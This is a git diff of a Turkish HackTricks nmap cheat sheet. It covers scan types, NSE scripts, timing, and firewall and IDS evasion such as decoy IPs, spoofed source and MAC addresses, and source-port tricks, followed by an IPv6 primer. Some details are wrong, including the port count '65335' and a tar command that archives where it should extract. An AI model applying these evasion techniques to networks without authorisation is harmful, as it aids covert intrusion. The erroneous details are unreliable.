* **`-PS <ports>`**: Eğer SYN/ACK ile yanıtlarsa açıktır (bağlantıyı sonlandırmamak için RST ile yanıtlarsa), RST ile yanıtlarsa kapalıdır ve yanıt vermezse ulaşılamazdır. Yetkileri yoksa, otomatik olarak toplam bir bağlantı kullanılır. Eğer portlar belirtilmemişse, 80'e gönderilir.
* **`-PA <ports>`**: Bir öncekiyle aynıdır ancak ACK ile, ikisini birleştirmek daha iyi sonuçlar verir.
* **`-PU <ports>`**: Amaçları zıttır, kapatılması beklenen portlara gönderilir. Bazı güvenlik duvarları yalnızca TCP bağlantılarını kontrol eder. Eğer kapalıysa port ulaşılamaz ile cevap verir, başka bir icmp ile cevap verirse veya cevap vermezse hedef ulaşılamaz olarak bırakılır.
* **`-PE, -PP, -PM`** : ICMP PING'ler: echo replay, zaman damgası ve adres maskesi. Hedefin aktif olup olmadığını öğrenmek için gönderilir.
* **`-PY<ports>`**: Varsayılan olarak 80'e SCTP INIT probeleri gönderir, INIT-ACK(açık) veya ABORT(kapalı) veya hiçbir şey veya ICMP ulaşılamaz (etkin değil) ile cevap verebilir.
* **`-PO <protocols>`**: Başlıkta bir protokol belirtilir, varsayılan olarak 1(ICMP), 2(IGMP) ve 4(Encap IP). ICMP, IGMP, TCP (6) ve UDP (17) protokolleri için protokol başlıkları gönderilir, geri kalanlar için yalnızca IP başlığı gönderilir. Amacı, başlıkların bozulmasından dolayı, Protokol ulaşılamaz veya aynı protokolün yanıtları ile cevap verilir ve hedefin aktif olup olmadığı bilinir.
* **`-PU <ports>`**: Amaçları zıttır, kapatılmış olması beklenen portlara gönderilir. Bazı güvenlik duvarları yalnızca TCP bağlantılarını kontrol eder. Eğer kapalıysa port ulaşılamaz yanıtı verilir, başka bir icmp yanıtı veya yanıt verilmezse hedef ulaşılamaz olarak bırakılır.
* **`-PE, -PP, -PM`** : ICMP PING'leri: echo replay, zaman damgası ve adres maskesi. Hedefin aktif olup olmadığını öğrenmek için gönderilir.
* **`-PY<ports>`**: Varsayılan olarak 80'e SCTP INIT sorguları gönderir, INIT-ACK(açık) veya ABORT(kapalı) veya hiçbir şey veya ICMP ulaşılamaz (etkin değil) yanıtı alabilir.
* **`-PO <protocols>`**: Başlıkta bir protokol belirtilir, varsayılan olarak 1(ICMP), 2(IGMP) ve 4(Encap IP). ICMP, IGMP, TCP (6) ve UDP (17) protokolleri için protokol başlıkları gönderilir, geri kalanlar için yalnızca IP başlığı gönderilir. Amacı, başlıkların bozukluğundan dolayı, Protokol ulaşılamaz veya aynı protokolün yanıtları alınır ve yukarıda olup olmadığını anlamak için yanıtlar alınır.
* **`-n`**: DNS yok
* **`-R`**: Her zaman DNS
@ -49,29 +50,29 @@ Nmap varsayılan olarak `-PA80 -PS443 -PE -PP` oluşan bir keşif aşaması baş
* **`-sS`**: Bağlantıyı tamamlamaz, bu nedenle iz bırakmaz, kullanılabilirse çok iyidir (yetkiler) Varsayılan olarak kullanılan budur.
* **`-sT`**: Bağlantıyı tamamlar, bu nedenle iz bırakır, ancak kesin olması için kullanılabilir. Varsayılan olarak yetkisiz.
* **`-sU`**: Daha yavaş, UDP için. Genellikle: DNS(53), SNMP(161,162), DHCP(67 ve 68), (-sU53,161,162,67,68): açık(cevap), kapalı(port ulaşılamaz), filtrelenmiş (başka bir ICMP), açık/filtrelenmiş (hiçbir şey). Açık/filtrelenmiş durumunda, -sV, nmap'ın desteklediği sürümlerden herhangi birini tespit etmek için birçok istek gönderir ve gerçek durumu tespit edebilir. Zamanı oldukça uzatır.
* **`-sY`**: SCTP protokolü bağlantıyı kuramazsa, bu nedenle kayıtlar olmaz, -PY gibi çalışır
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, bazı güvenlik duvarlarını aşabilir ve bilgi çıkarabilir. Standart uyumlu makinelerin SYN, RST veya ACK bayrakları içermeyen isteklere tümüyle RST ile yanıt vermesi gerektiği varsayımına dayanır: açık/filtrelenmiş(hiçbir şey), kapalı(RST), filtrelenmiş (ICMP ulaşılamaz). Windows, CIsco, BSDI ve OS/400'te güvenilir değildir. Unix'te evet.
* **`-sU`**: Daha yavaş, UDP için. Genellikle: DNS(53), SNMP(161,162), DHCP(67 ve 68), (-sU53,161,162,67,68): açık(yanıt), kapalı(port ulaşılamaz), filtrelenmiş (başka bir ICMP), açık/filtrelenmiş (hiçbir şey). Açık/filtrelenmiş durumunda, -sV nmap'in desteklediği sürümlerden herhangi birini tespit etmek için birçok istek gönderir ve gerçek durumu tespit edebilir. Zamanı oldukça artırır.
* **`-sY`**: SCTP protokolü bağlantıyı kuramaz, bu nedenle kayıtlar olmaz, -PY gibi çalışır
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, bazı güvenlik duvarlarını aşabilir ve bilgi çıkarabilir. Standart uyumlu makinelerin SYN, RST veya ACK bayrakları içermeyen tüm isteklere RST ile yanıt vermesi gerektiği varsayımına dayanır: açık/filtrelenmiş(hiçbir şey), kapalı(RST), filtrelenmiş (ICMP ulaşılamaz). Windows, CIsco, BSDI ve OS/400'te güvenilir değildir. Unix'te evet.
* **`-sM`**: Maimon taraması: FIN ve ACK bayrakları gönderir, BSD için kullanılır, şu anda tümünü kapalı olarak döndürecektir.
* **`-sA, sW`**: ACK ve Window, güvenlik duvarlarını tespit etmek için kullanılır, portların filtrelenip filtrelenmediğini bilmek için. -sW, açık/kapalı arasında ayrım yapar çünkü açıklar farklı bir pencere değeri ile yanıt verir: açık (pencere değeri 0 olmayan RST), kapalı (pencere = 0 RST), filtrelenmiş (ICMP ulaşılamaz veya hiçbir şey). Tüm bilgisayarlar bu şekilde çalışmaz, bu yüzden eğer hepsi kapalıysa, çalışmıyor demektir, eğer birkaçııksa, sorunsuz çalışıyor demektir ve eğer birçok açık ve az kapalı varsa, ters şekilde çalışıyor demektir.
* **`-sA, sW`**: ACK ve Window, güvenlik duvarlarını tespit etmek için kullanılır, portların filtrelenip filtrelenmediğini bilmek için. -sW, açık/kapalı arasında ayrım yapar çünkü açıklar farklı bir pencere değeri ile yanıt verir: açık (pencere değeri 0 olmayan RST), kapalı (pencere = 0 RST), filtrelenmiş (ICMP ulaşılamaz veya hiçbir şey). Tüm bilgisayarlar bu şekilde çalışmaz, bu nedenle tüm kapalıysa, çalışmıyor demektir, birkaç açıksa, düzgün çalışıyor demektir ve birçok açık ve birkaç kapalı varsa, ters şekilde çalışıyor demektir.
* **`-sI`:** Boşta tarama. Eğer aktif bir güvenlik duvarı varsa ve belirli bir IP'yi filtrelemediğini biliyorsak (veya sadece anonimlik istiyorsak) zombi tarayıcıyı kullanabiliriz (tüm portlar için çalışır), olası zombileri bulmak için ipidseq betiği veya exploit auxiliary/scanner/ip/ipidseq kullanabiliriz. Bu tarayıcı, IP paketlerinin IPID numarasına dayanır.
* **`--badsum`:** Yanlış toplam gönderir, bilgisayarlar paketleri reddeder, ancak güvenlik duvarları bir şeyler cevaplayabilir, güvenlik duvarlarını tespit etmek için kullanılır.
* **`-sZ`:** "Garip" SCTP tarayıcı, cookie echo parçaları ile probeler gönderirken açıksa düşürülmeleri veya kapalıysa ABORT ile yanıtlanmaları gerekir. Init'in geçemediği güvenlik duvarlarından geçebilir, kötü olan, filtrelenmiş ve açık arasında ayrım yapmaz.
* **`-sO`:** Protokol Ip taraması. Bazı durumlarda protokol bile ayırt edilemeyen yanlış ve boş başlıklar gönderir. Eğer ulaşılamaz protokol ICMP gelirse kapalıdır, ulaşılamaz port gelirse açıktır, başka bir hata gelirse filtrelenmiştir, hiçbir şey gelirse açık/filtrelenmiştir.
* **`-b <server>`:** FTPhost--> Bir makineden başka bir makinenin bağlantısını kullanarak bir ana bilgisayarı taramak için kullanılır, bu, başka bir makinenin ftp'sine bağlanarak ve başka bir makineden taramak istediğiniz bağlantılara dosya göndermesini isteyerek yapılır, yanıtlara göre açık olup olmadıklarını bileceğiz. \[\<user>:\<password>@]\<server>\[:\<port>] Artık neredeyse tüm ftp sunucuları buna izin vermez ve bu nedenle pratikte pek kullanışlı değildir.
* **`--badsum`:** Yanlış toplam gönderir, bilgisayarlar paketleri reddeder, ancak güvenlik duvarları bir şeyler yanıtlayabilir, güvenlik duvarlarını tespit etmek için kullanılır.
* **`-sZ`:** "Garip" SCTP tarayıcı, çerez yankısı parçalarıyla sorgular gönderirken açıksa düşürülmeli veya kapalıysa ABORT ile yanıtlanmalıdır. Init'in geçemediği güvenlik duvarlarından geçebilir, kötü olan, filtrelenmiş ve açık arasında ayrım yapmamasıdır.
* **`-sO`:** Protokol Ip taraması. Bazı durumlarda hatta protokol bile ayırt edilemeyen yanlış ve boş başlıklar gönderir. Eğer ICMP ulaşılamaz protokol gelirse kapalıdır, ulaşılamaz port gelirse açıktır, başka bir hata gelirse filtrelenmiştir, hiçbir şey gelirse açık|filtrelenmiştir.
* **`-b <server>`:** FTPhost--> Başka bir makineden bir makineyi taramak için kullanılır, bunu yapmak için başka bir makinenin ftp'sine bağlanarak istediğiniz portlara dosya göndermesini istersiniz, yanıtlara göre açık olup olmadıklarını bileceğiz. \[\<user>:\<password>@]\<server>\[:\<port>] Artık neredeyse tüm ftp sunucularına izin vermez ve bu nedenle pratikte pek kullanışlı değildir.
### **Merkezi analiz**
**-p:** Taramak için portları belirtmek için kullanılır. 65335'i seçmek için: **-p-** veya **-p all**. Nmap'ın popülerliğine göre dahili bir sıralaması vardır. Varsayılan olarak ilk 1000'i kullanır. **-F** (hızlı tarama) ile ilk 100'ü tarar. **--top-ports \<number>** Belirtilen sayıda ilk portları tarar (1'den 65335'e kadar). Portları rastgele sırayla kontrol eder, bunu önlemek için **-r** kullanılır. Ayrıca portları seçebiliriz: 20-30,80,443,1024- Bu sonuncusu 1024'ten sonrasına bakacağı anlamına gelir. Ayrıca portları protokollere göre gruplayabiliriz: U:53,T:21-25,80,139,S:9. Nmap'ın popüler portları içinde bir aralık seçebiliriz: -p \[-1024] nmap-services içinde bulunan 1024'e kadar olan portları tarar. **--port-ratio \<ratio>** Belirli bir oran aralığındaki en yaygın portları tarar, oran 0 ile 1 arasında olmalıdır.
**-p:** Taranacak portları belirtmek için kullanılır. 65335'i seçmek için: **-p-** veya **-p all**. Nmap'in popülerliğine göre dahili bir sıralaması vardır. Varsayılan olarak ilk 1000'i kullanır. **-F** (hızlı tarama) ile ilk 100'ü tarar. **--top-ports \<numero>** Belirtilen sayıda ilk portları tarar (1'den 65335'e kadar). Portları rastgele sırayla kontrol eder, bunu önlemek için **-r** kullanılır. Ayrıca portları seçebiliriz: 20-30,80,443,1024- Bu sonuncusu 1024'ten sonrasına bakacağı anlamına gelir. Ayrıca portları protokollere göre gruplayabiliriz: U:53,T:21-25,80,139,S:9. Nmap'in popüler portları arasından bir aralık seçebiliriz: -p \[-1024] nmap-services içinde bulunan 1024'e kadar olan portları tarar. **--port-ratio \<ratio>** Belirtilen oran aralığındaki en yaygın portları tarar, oran 0 ile 1 arasında olmalıdır.
**-sV** Sürüm taraması, yoğunluğu 0 ile 9 arasında ayarlanabilir, varsayılan 7.
**--version-intensity \<number>** Yoğunluğu ayarlarız, daha düşükse sadece olasılığı yüksek olan sondaları gönderir, ancak tümünü değil. Bu şekilde UDP tarama süresini önemli ölçüde kısaltabiliriz.
**--version-intensity \<numero>** Yoğunluğu ayarlarız, daha düşükse sadece olasılığı yüksek olan sorguları gönderir, ancak tümünü değil. Bu sayede UDP tarama süresini önemli ölçüde kısaltabiliriz.
**-O** İşletim sistemi tespiti
**--osscan-limit** Bir ana bilgisayarı iyi tarayabilmek için en az bir açık ve bir kapalı port olması gerekir, bu koşul sağlanmazsa ve bu seçeneği belirlediysek, işletim sistemi tahmini yapmaz (zaman kazandırır)
**--osscan-guess** Os tespiti mükemmel olmadığında daha fazla çaba harcar
**--osscan-limit** Bir ana bilgisayarı iyi taramak için en az bir açık ve bir kapalı port olması gerekmektedir, bu koşul sağlanmazsa ve bu seçeneği belirlediysek, işletim sistemi tahmini yapmaz (zaman kazandırır)
**--osscan-guess** OS tespiti mükemmel olmadığında daha fazla çaba harcar
**Scriptler**
@ -83,10 +84,10 @@ Mevcut türler: auth, broadcast, default, discovery, dos, exploit, external, fuz
* **Auth:** kimlik doğrulama için mevcut tüm _scriptleri_ çalıştırır
* **Default:** aracın varsayılan temel _scriptlerini_ çalıştırır
* **Discovery:** _hedef_ veya kurban hakkında bilgi toplar
* **Discovery:** hedef veya kurban hakkında bilgi toplar
* **External:** harici kaynakları kullanmak için _script_
* **Intrusive:** kurban veya _hedef_ için müdahaleci olarak kabul edilen _scriptleri_ kullanır
* **Malware:** kötü amaçlı yazılım veya _arka kapılar_ tarafından açık bağlantıları kontrol eder
* **Intrusive:** kurban veya hedef için müdahaleci olarak kabul edilen _scriptleri_ kullanır
* **Malware:** kötü amaçlı yazılım veya _backdoor_ (arka kapı) tarafından açık bağlantıları kontrol eder
* **Safe:** müdahaleci olmayan _scriptleri_ çalıştırır
* **Vuln:** en bilinen zayıflıkları keşfeder
* **All:** mevcut tüm NSE uzantılı _scriptleri_ çalıştırır
@ -95,7 +96,7 @@ Scriptleri aramak için:
**nmap --script-help="http-\*" -> http- ile başlayanlar**
**nmap --script-help="not intrusive" -> Bunlar hariç tümü**
**nmap --script-help="not intrusive" -> Bunlar hariç tüm scriptler**
**nmap --script-help="default or safe" -> Birinde veya her ikisinde olanlar**
@ -113,21 +114,21 @@ Scriptleri aramak için:
\--script-updatedb
**Bir scripti kullanmak için sadece şunu yazmanız yeterlidir: nmap --script Script_Adı hedef** --> Scripti yazdığınızda hem script hem de tarayıcı çalıştırılır, bu nedenle tarayıcı seçenekleri de ekleyebiliriz, sadece güvenli olanları çalıştırmak için **"safe=1"** ekleyebiliriz.
**Bir scripti kullanmak için sadece şunu yazmak yeterlidir: nmap --script Script_Adı hedef** --> Script yazıldığında hem script hem de tarayıcı çalıştırılır, bu nedenle tarayıcı seçenekleri de ekleyebiliriz, sadece güvenli olanları çalıştırmak için **"safe=1"** ekleyebiliriz.
**Zaman Kontrolü**
**Nmap saniye, dakika, ms cinsinden zamanı değiştirebilir:** --host-timeout arguments 900000ms, 900, 900s ve 15m hepsi aynı işi yapar.
Nmap, taranacak toplam host sayısını gruplara böler ve bu grupları bloklar halinde analiz eder, tüm gruplar analiz edilene kadar bir sonraki bloğa geçmez (ve kullanıcıya blok analiz edilene kadar herhangi bir güncelleme almaz), bu nedenle nmap için büyük gruplar kullanmak daha iyidir. Varsayılan olarak sınıf C'de 256 kullanır.
Nmap, taranacak toplam host sayısını gruplara böler ve bu grupları bloklar halinde analiz eder, böylece tüm gruplar analiz edilene kadar bir sonraki bloğa geçmez (ve kullanıcıya blok analiz edilene kadar herhangi bir güncelleme alınmaz), bu nedenle nmap için büyük gruplar kullanmak daha iyidir. Varsayılan olarak sınıf C'de 256 kullanır.
Değiştirebilirsiniz\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Paralel tarama grup boyutlarını ayarlayın)
Paralel tarama sayısını kontrol edebilirsiniz ancak genellikle gerekli değildir (nmap, ağ durumuna göre otomatik kontrolü zaten içerir): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Paralel tarama sayısını kontrol edebilirsiniz ancak genellikle gerekli değildir (nmap ağ durumuna göre otomatik kontrol sağlar): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Rtt zaman aşımını değiştirebilirsiniz, ancak genellikle gerekli değildir: **--min-rtt-timeout** _**\<zaman>**_**,** **--max-rtt-timeout** _**\<zaman>**_**,** **--initial-rtt-timeout** _**\<zaman>**_
Deneme sayısını değiştirebilirsiniz: **--max-retries** _**\<denemesayısı>**_
Deneme sayısını değiştirebilirsiniz:**--max-retries** _**\<denemesayısı>**_
Bir hostun tarama süresini değiştirebilirsiniz: **--host-timeout** _**\<zaman>**_
@ -135,9 +136,9 @@ Her test arasındaki süreyi yavaşlatmak için: **--scan-delay** _**\<zaman>**_
Saniyedeki paket sayısını değiştirebilirsiniz: **--min-rate** _**\<sayı>**_**;** **--max-rate** _**\<sayı>**_
Filtrelenmiş veya kapalı birçok port yanıt vermek için uzun sürebilir, yalnızca açık olanları ilgilendiriyorsa daha hızlı tarama yapabilirsiniz: **--defeat-rst-ratelimit**
Filtrelenmiş veya kapalı birçok port yanıt vermek için uzun sürebilir, yalnızca açık olanları ilgilendiriyorsa daha hızlı tarama yapabiliriz: **--defeat-rst-ratelimit**
Nmap'ın ne kadar saldırgan olmasını istediğinizi belirlemek için: -T paranoid|sneaky|polite|normal|aggressive|insane
Nmap'ın ne kadar saldırgan olmasını istediğimizi belirlemek için: -T paranoid|sneaky|polite|normal|aggressive|insane
\-T (0-1)
@ -155,23 +156,23 @@ Nmap'ın ne kadar saldırgan olmasını istediğinizi belirlemek için: -T paran
Portları kapatır ve paketleri analiz eder.
**-f** Paketleri parçalamak için, varsayılan olarak başlık sonrası 8 bayt parçalar, bu boyutu belirtmek için ..mtu kullanırız (bununla birlikte, -f kullanmayın), ofset 8'in katı olmalıdır. **Sürüm tarama ve scriptler parçalamayı desteklemez**
**-f** Paketleri parçalamak için, varsayılan olarak başlık sonrası 8 bayt parçalar, bu boyutu belirtmek için ..mtu kullanırız (bununla birlikte, -f kullanmayın), ofset 8'in katı olmalıdır. **Versiyon tarama ve scriptler parçalamayı desteklemez**
**-D decoy1,decoy2,BEN** Nmap, başka IP adresleriyle tarama gönderir, böylece kendinizi gizlersiniz. ME'yi listeye eklerseniz, nmap sizi oraya yerleştirir, sizi tamamen gizlemek için kendinizden önce 5 veya 6 eklemek daha iyidir. RND:\<sayı> ile rastgele IP'ler oluşturabilirsiniz. TCP bağlantısı olmayan sürüm algılayıcılarıyla çalışmaz. Bir ağ içindeyseniz, etkin IP'leri kullanmanız önemlidir, aksi takdirde sizin tek etkin kişi olduğunuzu kolayca anlamak çok kolay olacaktır.
**-D decoy1,decoy2,ME** Nmap, diğer IP adresleriyle taramalar gönderir, böylece kendinizi gizler. ME'yi listeye eklerseniz, nmap sizi oraya yerleştirir, sizi tamamen gizlemek için kendinizden önce 5 veya 6 eklemek daha iyidir. RND:\<sayı> ile rastgele IP'ler oluşturabilirsiniz. TCP bağlantısı olmayan versiyon algılayıcılarıyla çalışmaz. Bir ağ içindeyseniz, etkin IP'leri kullanmanız önemlidir, aksi takdirde sizin tek etkin olduğunuzu kolayca anlamak mümkün olacaktır.
Rastgele IP'ler kullanmak için: nmap-D RND: 10 Hedef_IP
**-S IP** Nmap, IP adresinizi alamazsa onu vermeniz gerekir. Ayrıca, başka bir hedefin onları taramakta olduğunu düşündürmek için de kullanılır.
**-S IP** Nmap, IP adresinizi alamadığında bunu vermeniz gerekir. Ayrıca, başka bir hedefin tarama yaptığını düşündürmek için de kullanılır.
**-e \<arayüz>** Arayüzü seçmek için
Birçok yönetici, her şeyin düzgün çalışması için giriş kapılarınıık bırakır ve başka bir çözüm bulmaktan daha kolaydır. Bu, DNS veya FTP gibi portlar olabilir... Bu zafiyeti aramak için nmap şunları içerir: **--source-port** _**\<portnumarası>**_**;-g** _**\<portnumarası>**_ _Eşdeğerdir_
Birçok yönetici, her şeyin düzgün çalışması için giriş kapılarınıık bırakır ve başka bir çözüm aramaktan kaçınırlar. Bu, DNS veya FTP gibi portlar olabilir... Bu zayıflığı aramak için nmap şunları içerir: **--source-port** _**\<portnumarası>**_**;-g** _**\<portnumarası>**_ _Eşdeğerdir_
**--data** _**\<onaltılık dize>**_ Onaltılık metin göndermek için: --data 0xdeadbeef ve --data \xCA\xFE\x09
**--data-string** _**\<dize>**_ Normal metin göndermek için: --data-string "Güvenlik Operasyonları tarafından yapılan tarama, uzantı 7192 tarafından"
**--data-string** _**\<dize>**_ Normal metin göndermek için: --data-string "Güvenlik Operasyonları tarafından yapılan tarama, uzantı 7192"
**--data-length** _**\<sayı>**_ Nmap yalnızca başlıklar gönderir, bu sayede rastgele oluşturulacak belirli bir bayt sayısı ekleriz
**--data-length** _**\<sayı>**_ Nmap yalnızca başlıklar gönderir, bu sayede rastgele oluşturulan belirli bir bayt sayısını ekleriz
IP paketini tamamen yapılandırmak için **--ip-options** kullanın
@ -181,10 +182,10 @@ Gönderilen ve alınan paketlerdeki seçenekleri görmek istiyorsanız, --packet
**--randomize-hosts** Saldırının daha az belirgin olmasını sağlamak için
**--spoof-mac** _**\<MAC adresi, önek veya satıcı adı>**_ Mac adresini değiştirmek için örnekler: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2 ve Cisco
**--spoof-mac** _**\<MAC adresi, önek veya üretici adı>**_ Mac adresini değiştirmek için örnekler: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2 ve Cisco
**--proxies** _**\<Proxy URL'lerinin virgülle ayrılmış listesi>**_ Proxies kullanmak için, bazen bir proxy nmap'in istediği kadar çok bağlantıyıık tutmaz, bu yüzden paralelizmi değiştirmek gerekebilir: --max-parallelism
**-sP** ARP ile ağdaki hostları keşfetmek için
**-sP** ARP ile ağdaki ana bilgisayarları keşfetmek için
Çoğu yönetici, belirli bir bağlantı noktasından gelen tüm paketlerin geçmesine izin veren bir güvenlik duvarı kuralı oluşturur (örneğin 20, 53 ve 67 gibi), nmap'e paketlerimizi bu bağlantı noktalarından göndermesini söyleyebiliriz: **nmap --source-port 53 Ip**
@ -194,7 +195,7 @@ Gönderilen ve alınan paketlerdeki seçenekleri görmek istiyorsanız, --packet
**-oX dosya** XML çıktısı
**-oS dosya** Script kidies çıktısı
**-oS dosya** Script çocukları çıktısı
**-oG dosya** Grepable çıktı
@ -204,7 +205,7 @@ Gönderilen ve alınan paketlerdeki seçenekleri görmek istiyorsanız, --packet
**-d seviye** hata ayıklama
**--reason** Host ve durumun nedeni
**--reason** Ana bilgisayarın ve durumun nedeni
**--stats-every zaman** Belirli aralıklarla durumu bildirir
@ -216,7 +217,7 @@ Gönderilen ve alınan paketlerdeki seçenekleri görmek istiyorsanız, --packet
**Çeşitli**
**-6** Ipv6'ya izin verir
**-6** ipv6'ya izin verir
**-A** -O -sV -sC --traceroute ile aynıdır
@ -251,36 +252,18 @@ Nmap klasörüne indirip kurmak için:
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
Ayrıca, veritabanlarından paketleri indirmek ve /usr/share/nmap/scripts/vulscan/ klasörüne eklemek gerekecektir
Ayrıca, veritabanı paketlerini indirip /usr/share/nmap/scripts/vulscan/ klasörüne eklemek gerekecektir
Kullanım:
Hepsini kullanmak için: sudo nmap -sV --script=vulscan TARAMA_EDILEN_HOST
Hepsini kullanmak için: sudo nmap -sV --script=vulscan TARAMA_YAPILACAK_IP
Belirli bir veritabanını kullanmak için: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv TARAMA_EDILEN_HOST
Belirli bir veritabanını kullanmak için: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv TARAMA_YAPILACAK_IP
## Nmap Hizmet taramasını x16 hızlandırma
[**Bu gönderiye**](https://joshua.hu/nmap-speedup-service-scanning-16x) göre, nmap hizmet analizini **`/usr/share/nmap/nmap-service-probes`** dosyasındaki tüm **`totalwaitms`** değerlerini **300** ve **`tcpwrappedms`** değerini **200** olarak değiştirerek hızlandırabilirsiniz.
[**Bu gönderiye**](https://joshua.hu/nmap-speedup-service-scanning-16x) göre, nmap hizmet analizini hızlandırabilirsiniz, tüm **`totalwaitms`** değerlerini **`/usr/share/nmap/nmap-service-probes`** dosyasında **300** ve **`tcpwrappedms`** değerlerini **200** olarak değiştirerek.
Ayrıca, özellikle tanımlanmamış **`servicewaitms`** değerine sahip probeler varsayılan olarak **`5000`** değerini kullanır. Bu nedenle, her bir probeye değer ekleyebiliriz veya **nmap**'i kendimiz derleyerek [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) dosyasındaki varsayılan değeri değiştirebiliriz.
Eğer **`totalwaitms`** ve **`tcpwrappedms`** değerlerini hiç değiştirmek istemiyorsanız, `/usr/share/nmap/nmap-service-probes` dosyasındaki bu değerlerin tamamen yok sayılmasını sağlayacak şekilde [ayıklama kodunu](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) düzenleyebilirsiniz.
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu görün
* **💬 Discord grubuna** [**katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
</details>
Eğer **`totalwaitms`** ve **`tcpwrappedms`** değerlerini hiç değiştirmek istemiyorsanız, `/usr/share/nmap/nmap-service-probes` dosyasındaki bu değerlerin tamamen yok sayılmasını sağlayacak şekilde [ayrıştırma kodunu](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) düzenleyebilirsiniz.

View file

@ -1,41 +1,42 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'ler**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
# IPv6 Temel teori
## Ağlar
IPv6 adresleri, ağ organizasyonunu ve cihaz etkileşimini geliştirmek için yapılandırılmıştır. Bir IPv6 adresi şu şekilde bölünmüştür:
IPv6 adresleri ağ organizasyonunu ve cihaz etkileşimini geliştirmek için yapılandırılmıştır. Bir IPv6 adresi şu şekilde bölünmüştür:
1. **Ağ Öneki**: Ağı belirleyen ilk 48 bit.
2. **Alt Ağ Kimliği**: Ağ içinde belirli alt ağları tanımlamak için kullanılan 16 bit.
3. **Arayüz Tanımlayıcı**: Alt ağ içinde benzersiz olarak bir cihazı tanımlayan son 64 bit.
3. **Arayüz Tanımlayıcı**: Alt ağ içindeki bir cihazı benzersiz olarak tanımlayan son 64 bit.
IPv6, IPv4'te bulunan ARP protokolünü atlayarak, iki temel mesaj içeren **ICMPv6**'yı tanıtır:
IPv6, IPv4'te bulunan ARP protokolünü atladığı gibi, iki temel mesajla **ICMPv6**'yı tanıtır:
- **Komşu İstemi (NS)**: Adres çözümlemesi için çoklu mesajlar.
- **Komşu İlanı (NA)**: NS'ye veya kendiliğinden yapılan duyurulara tekli yanıtlar.
- **Komşu İlanı (NA)**: NS'ye veya kendiliğinden duyurulara tekil yanıtlar.
IPv6 ayrıca özel adres türlerini de içerir:
- **Döngü Adresi (`::1`)**: İç iletişim için IPv4'ün `127.0.0.1`'ine eşdeğerdir.
- **Bağ Yerel Adresler (`FE80::/10`)**: İnternet yönlendirmesi için değil, yerel ağ etkinlikleri için kullanılır. Aynı yerel ağdaki cihazlar, bu aralığı kullanarak birbirlerini keşfedebilir.
- **Döngü Geri Adresi (`::1`)**: İç iletişim için IPv4'ün `127.0.0.1`'ine eşdeğerdir.
